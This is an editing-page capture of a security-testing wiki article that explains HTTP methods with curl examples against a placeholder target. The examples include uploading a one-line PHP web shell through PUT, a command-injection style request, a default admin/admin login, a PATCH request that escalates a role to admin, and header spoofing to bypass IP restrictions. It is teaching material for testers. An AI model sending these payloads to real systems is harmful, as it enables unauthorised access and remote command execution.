Editing
Making HTTP Requests
(section)
Jump to navigation
Jump to search
Warning:
You are not logged in. Your IP address will be publicly visible if you make any edits. If you
log in
or
create an account
, your edits will be attributed to your username, along with other benefits.
Anti-spam check. Do
not
fill this in!
= Making HTTP Requests = == Introduction == HTTP requests are used to interact with web servers by requesting data, submitting forms, uploading files, or modifying resources. Understanding how each method works enables deeper interaction with web applications and can expose misconfigurations or unintended functionality. This page outlines how common HTTP methods are used in practice, with real-world examples suitable for exploration and testing. == GET == The GET method is used to retrieve data from a server. It appends parameters to the URL and leaves traces in logs and browser history. '''Usage Example''' <pre> curl 'http://target.site/profile?id=1337' </pre> '''Notes''' * Used for parameter enumeration (?id=1, ?id=2, ...) * Reflected and stored XSS often triggered via GET * Sensitive data in GET can be exposed in logs or referers == POST == The POST method submits data to the server in the request body. Itβs used in login forms, registration, comment submission, and more. '''Usage Example (Form Login)''' <pre> curl -X POST http://target.site/login \ -H "Content-Type: application/x-www-form-urlencoded" \ --data "username=admin&password=admin" </pre> '''Usage Example (JSON)''' <pre> curl -X POST http://target.site/api \ -H "Content-Type: application/json" \ -d '{"cmd":"whoami"}' </pre> '''Notes''' * Hidden parameters or roles often sent in POST * Commonly used for SQL injection and command injection * Some endpoints accept both GET and POST (test both) == PUT == PUT is used to upload or replace resources. When enabled and not restricted, it may allow file upload attacks. '''Usage Example (upload PHP shell)''' <pre> curl -X PUT http://target.site/uploads/shell.php \ --data '<?php system($_GET["cmd"]); ?>' </pre> '''Notes''' * Rarely enabled on production servers * Can be used to gain arbitrary file write if not locked down * Test using OPTIONS method to check for support == DELETE == DELETE requests are meant to remove resources. While often blocked or protected, it can be misconfigured and abused. '''Usage Example''' <pre> curl -X DELETE http://target.site/api/users/42 </pre> '''Notes''' * May not require authentication in misconfigured APIs * If unauthenticated DELETE is accepted, privilege escalation or DoS may be possible == PATCH == PATCH modifies part of a resource instead of replacing the whole. Seen in APIs that allow editing. '''Usage Example''' <pre> curl -X PATCH http://target.site/api/user/42 \ -H "Content-Type: application/json" \ -d '{"role":"admin"}' </pre> '''Notes''' * Can be used to escalate privileges in improperly secured APIs * Input validation should always be tested == HEAD == HEAD requests are identical to GET but return only headers. Useful for checking if a file exists or for recon. '''Usage Example''' <pre> curl -I http://target.site/admin.php </pre> '''Notes''' * Useful for testing resource existence without downloading content * Can bypass some security tools that ignore HEAD requests == OPTIONS == OPTIONS asks the server what methods are allowed on a given endpoint. '''Usage Example''' <pre> curl -X OPTIONS http://target.site/api/ </pre> '''Notes''' * Helps detect hidden endpoints or misconfigured CORS policies * Can reveal support for PUT, DELETE, etc. * Some APIs respond differently based on user-agent == TRACE == TRACE echoes the request back to the client. It can be abused in some edge-case attacks like Cross Site Tracing (XST). '''Usage Example''' <pre> curl -X TRACE http://target.site </pre> '''Notes''' * Rarely enabled * If active, can reflect headers (e.g., cookies) in response == Common Headers to Use in Requests == {| class="wikitable" ! Header !! Description |- | Host || Target domain |- | User-Agent || Client identity, can be spoofed |- | Referer || Previous page, can be manipulated |- | Origin || Cross-origin indicator (CORS) |- | Authorization || Basic or Bearer tokens |- | Content-Type || Declares body format (form, JSON, XML) |- | Cookie || Session identifier injection |- | X-Forwarded-For || Spoofed IP for bypassing IP-based restrictions |} == Tools for Crafting Requests == {| class="wikitable" ! Tool !! Use Case !! Notes |- | [[Tools/curl|curl]] || All HTTP methods || Lightweight, scriptable |- | [[Tools/httpie|httpie]] || Human-readable requests || Easier syntax than curl |- | [[Tools/burp|Burp Suite]] || Intercept & modify requests || GUI + repeater |- | [[Tools/zap|OWASP ZAP]] || Automated scanning + proxy || Supports scripting |- | [[Tools/postman|Postman]] || API testing & automation || GUI-based |} == See also == * /HTTP_Protocols * Headers * Cookies_and_Sessions * curl * Bypassing_Authentication * Content_Discovery
Summary:
Please note that all contributions to HackOps may be edited, altered, or removed by other contributors. If you do not want your writing to be edited mercilessly, then do not submit it here.
You are also promising us that you wrote this yourself, or copied it from a public domain or similar free resource (see
HackOps:Copyrights
for details).
Do not submit copyrighted work without permission!
Cancel
Editing help
(opens in new window)
Navigation menu
Personal tools
Not logged in
Talk
Contributions
Create account
Log in
Namespaces
Page
Discussion
English
Views
Read
Edit
Edit source
View history
More
Search
Navigation
Tools
What links here
Related changes
Special pages
Page information